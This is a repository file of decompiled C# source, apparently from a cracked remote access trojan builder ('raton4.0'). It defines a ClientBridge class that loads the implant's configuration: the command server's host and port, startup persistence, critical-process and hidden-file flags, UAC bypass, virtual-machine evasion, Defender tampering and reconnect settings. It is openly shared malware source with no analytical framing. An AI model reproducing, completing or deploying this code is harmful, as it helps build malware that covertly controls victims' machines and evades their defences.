Files
raton4.0-source/Client/ClientBridge.cs
T
2026-08-27 11:23:13 -06:00

95 lines
2.2 KiB
C#

// Decompiled with JetBrains decompiler
// Type: ClientBridge
// Assembly: Client, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 92DF2D60-35B0-4A06-AFD8-50A246F39510
// Assembly location: C:\Users\user\Desktop\v3.8.0 Deluxe Plugins (v4.0.0) cracked\Builder\Client.exe
using Stuff;
#nullable disable
public class ClientBridge : IClientBridge
{
private readonly SillyClient _client;
public string UID { get; private set; }
public ClientBridge(SillyClient client)
{
this._client = client;
this.Version = Config.Version;
this.Mutex = Config.Mutex;
this.Port = Config.pt;
this.Host = Config.ht;
this.Startup = Config.Startup;
this.Delay = Config.Delay;
this.ProcessCritical = Config.ProcessCritical;
this.HideFile = Config.HideFile;
this.Box = Config.Box;
this.BoxMsg = Config.BoxMsg;
this.BoxIcon = Config.BoxIcon;
this.UAC = Config.UAC;
this.Assist = Config.Assist;
this.OpenWebsite = Config.OpenWebsite;
this.Website = Config.Website;
this.VM = Config.VM;
this.Tag = Config.Tag;
this.BoxTit = Config.BoxTit;
this.HidProc = Config.HidProc;
this.UACBy = Config.UACBy;
this.Password = Config.Password;
this.Raw = Config.Raw;
this.Reconnect = Config.Reconnect;
this.Defender = Config.Defender;
}
public void Send(byte[] data) => this._client.Send(data);
public string Version { get; }
public string Mutex { get; }
public int Port { get; }
public string Host { get; }
public bool Startup { get; }
public int Delay { get; }
public bool ProcessCritical { get; }
public bool HideFile { get; }
public bool Box { get; }
public string BoxMsg { get; }
public string BoxIcon { get; }
public bool UAC { get; }
public bool Assist { get; }
public bool OpenWebsite { get; }
public string Website { get; }
public bool VM { get; }
public string Tag { get; }
public string BoxTit { get; }
public bool HidProc { get; }
public bool UACBy { get; }
public string Password { get; }
public string Raw { get; }
public int Reconnect { get; }
public bool Defender { get; }
}